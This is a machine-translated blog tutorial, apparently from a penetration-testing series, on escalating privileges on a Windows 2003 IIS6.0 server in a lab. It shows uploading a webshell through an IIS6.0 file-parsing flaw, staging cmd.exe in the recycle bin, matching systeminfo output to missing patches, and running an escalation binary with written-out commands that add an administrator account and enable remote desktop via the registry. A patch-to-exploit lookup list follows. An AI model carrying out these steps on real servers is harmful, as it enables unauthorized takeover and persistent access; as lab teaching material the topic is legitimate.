当前位置:网站首页>108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]
108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]
2022-07-07 11:56:00 【qwsn】
In my submission , Whether studying safety or engaging in safety , More or less, I have some feelings and sense of mission !!!
List of articles
One 、Windows IIS6.0 Spillover claims
1、Windos Introduction to power raising :
window Servers often use win2003、win2008 and win2012. In the penetration test , The permission we obtained is iis_user User group , To get higher permissions, you need to raise the current user to the system user or super administrator user group . Higher permissions facilitate our subsequent penetration , Extended range test .
2、 Comparison of program permissions :
stay iis Inside , The size of permissions in turn :aspx>php>=asp
,aspx By default, it can execute terminal commands 、php and asp If the command cannot be executed , stay wscript.shell If the component is not deleted , Can be uploaded cmd To the executable directory to execute terminal commands .
3、 Exploit process :
(1) Experimental environment :
1. Target environment :
(1) virtual machine Windows2003【upload.moonteam.com】【192.168.97.132】
(2) Scripting language environment :php/asp/aspx Language environment exists
2. attack :
(1) virtual machine Win7【192.168.97.130】
(2)Firefox+Burpsuite+ Ant sword + Malaysia
3. The network environment :
(1)VMware Built NAT The Internet
(2) Target link :
URL:http://upload.moonteam.com/upload_6.php
(3) Experimental process :
First step : Visit the target link , After a series of tests , It turns out that this is IIS6.0 File parsing vulnerability , Therefore, you can upload Damascus through vulnerability characteristics .
The second step : Upload Malaysia
The third step : Visit Malaysia http://upload.moonteam.com/upfile/heroes.asp;.jpg
# The password of Malaysia is heroes
Step four : Click on [ Service information Component support ] modular , View the command execution component wscript.shell Whether the component is deleted
Step five : Click on [RECYCLER] modular , To view the recycle bin directory .
Step six : Click on [ Upload file module ], To upload cmd.exe Go to the recycle bin directory .
Step seven : Click on [CMD perform ] modular , Then fill in SHELL Path and command to execute , Finally check WScriptShell Component and click to execute , Thus test cmd.exe Of whoami command .
Step eight : Click on [CMD perform ] modular , Carry out orders systeminfo
, Save the results to the local systeminfo.txt.
Step nine : Using scripts wes.py, perform python wes.py systeminfo.txt > res.csv
command , Get out of the hole , Save to res.csv
Step 10 : analysis res.csv, Search vulnerability , Find out CVE-2009-1535 Of IIS6.0 There are loopholes in rights raising
Step 11 : Click on [ Upload file module ], To upload IIS6.0.exe Go to the recycle bin directory , But the upload failed , Here we go to upload a Damascus dedicated to uploading files , Then upload IIS6.0.exe
The twelfth step : Visit Malaysia ,http://upload.moonteam.com/upfile/up.aspx
# password admin, Upload IIS6.0.exe Lift the right tool to the recycle bin directory
Thirteenth Step : Back to the beginning of Malaysia , Get into [CMD perform ] modular , type C:\RECYCLER\IIS6.0.exe "whoami"
# Pay attention to the format of executing the command
The fourteenth step : Enter the following commands in turn , To create users demo1, Join the administrators group , Turn on 3389 port , Connect the target remotely .C:\RECYCLER\IIS6.0.exe "net user demo1 123 /add"
# Add users
C:\RECYCLER\IIS6.0.exe "net localgroup administrators demo1 /add"
# Join the administrators group C:\RECYCLER\IIS6.0.exe "net user"
# View created users
C:\RECYCLER\IIS6.0.exe "netstat -ano"
# Look at the open ports
C:\RECYCLER\IIS6.0.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
# Turn on 3389C:\RECYCLER\IIS6.0.exe "netstat -ano"
# Look at the open ports
The last step : type win+r, Input mstsc, Fill in the target ip, The account just created , So as to achieve the purpose of remote login .
attach 1: Some system vulnerabilities correspond to patch numbers
Win2003
KB2360937|MS10-084
KB2478960|MS11-014
KB2507938|MS11-056
KB2566454|MS11-062
KB2646524|MS12-003
KB2645640|MS12-009
KB2641653|MS12-018
KB944653|MS07-067
KB952004|MS09-012 PR
KB971657|MS09-041
KB2620712|MS11-097
KB2393802|MS11-011
KB942831|MS08-005
KB2503665|MS11-046
KB2592799|MS11-080
KB956572|MS09-012 barbecue
KB2621440|MS12-020
KB977165|MS10-015Ms Viru
KB3139914|MS16-032
KB3124280|MS16-016
KB3134228|MS16-014
KB3079904|MS15-097
KB3077657|MS15-077
KB3045171|MS15-051
KB3000061|MS14-058
KB2829361|MS13-046
KB2850851|MS13-053EPATHOBJ 0day limit 32 position
KB2707511|MS12-042 sysret -pid
KB2124261|KB2271195 MS10-065 IIS7
KB970483|MS09-020IIS6
Win2008
KB3139914|MS16-032
KB3124280|MS16-016
KB3134228|MS16-014
KB3079904|MS15-097
KB3077657|MS15-077
KB3045171|MS15-051
KB3000061|MS14-058
KB2829361|MS13-046
KB2850851|MS13-053EPATHOBJ 0day limit 32 position
KB2707511|MS12-042 sysret -pid
KB2124261|KB2271195 MS10-065 IIS7
KB970483|MS09-020IIS6
Win2012
KB3139914|MS16-032
KB3124280|MS16-016
KB3134228|MS16-014
KB3079904|MS15-097
KB3077657|MS15-077
KB3045171|MS15-051
KB3000061|MS14-058
KB2829361|MS13-046
KB2850851|MS13-053EPATHOBJ 0day limit 32 position
KB2707511|MS12-042 sysret -pid
KB2124261|KB2271195 MS10-065 IIS7
KB970483|MS09-020IIS6
attach 2:aspx Authority is higher than asp An example of
边栏推荐
- 本地navicat连接liunx下的oracle报权限不足
- Flet教程之 14 ListTile 基础入门(教程含源码)
- Two week selection of tdengine community issues | phase II
- 【滤波跟踪】捷联惯导纯惯导解算matlab实现
- STM32 entry development write DS18B20 temperature sensor driver (read ambient temperature, support cascade)
- Internet Protocol
- 深度学习秋招面试题集锦(一)
- When sink is consumed in mysql, the self incrementing primary key has been set in the database table. How to operate in Flink?
- Talk about SOC startup (IX) adding a new board to uboot
- STM32 entry development uses IIC hardware timing to read and write AT24C08 (EEPROM)
猜你喜欢
sql里,我想设置外键,为什么出现这个问题
Technology sharing | packet capturing analysis TCP protocol
人大金仓受邀参加《航天七〇六“我与航天电脑有约”全国合作伙伴大会》
Visual Studio 2019 (LocalDB)\MSSQLLocalDB SQL Server 2014 数据库版本为852无法打开,此服务器支持782版及更低版本
本地navicat连接liunx下的oracle报权限不足
CMU15445 (Fall 2019) 之 Project#2 - Hash Table 详解
[filter tracking] comparison between EKF and UKF based on MATLAB extended Kalman filter [including Matlab source code 1933]
There are so many factors that imprison you
千人规模互联网公司研发效能成功之路
Test the foundation of development, and teach you to prepare for a fully functional web platform environment
随机推荐
The annual salary of general test is 15W, and the annual salary of test and development is 30w+. What is the difference between the two?
STM32入门开发 采用IIC硬件时序读写AT24C08(EEPROM)
Time bomb inside the software: 0-day log4shell is just the tip of the iceberg
R语言使用quantile函数计算评分值的分位数(20%、40%、60%、80%)、使用逻辑操作符将对应的分位区间(quantile)编码为分类值生成新的字段、strsplit函数将学生的名和姓拆分
R语言可视化分面图、假设检验、多变量分组t检验、可视化多变量分组分面箱图(faceting boxplot)并添加显著性水平、添加抖动数据点(jitter points)
【滤波跟踪】捷联惯导纯惯导解算matlab实现
Excel公式知多少?
STM32入门开发 NEC红外线协议解码(超低成本无线传输方案)
Easyui学习整理笔记
. Net Maui performance improvement
[Yugong series] go teaching course 005 variables in July 2022
超标量处理器设计 姚永斌 第10章 指令提交 摘录
In depth learning autumn recruitment interview questions collection (1)
.NET MAUI 性能提升
清华姚班程序员,网上征婚被骂?
Zhou Yajin, a top safety scholar of Zhejiang University, is a curiosity driven activist
There are so many factors that imprison you
Fleet tutorial 19 introduction to verticaldivider separator component Foundation (tutorial includes source code)
Some opinions and code implementation of Siou loss: more powerful learning for bounding box regression zhora gevorgyan
STM32 entry development write DS18B20 temperature sensor driver (read ambient temperature, support cascade)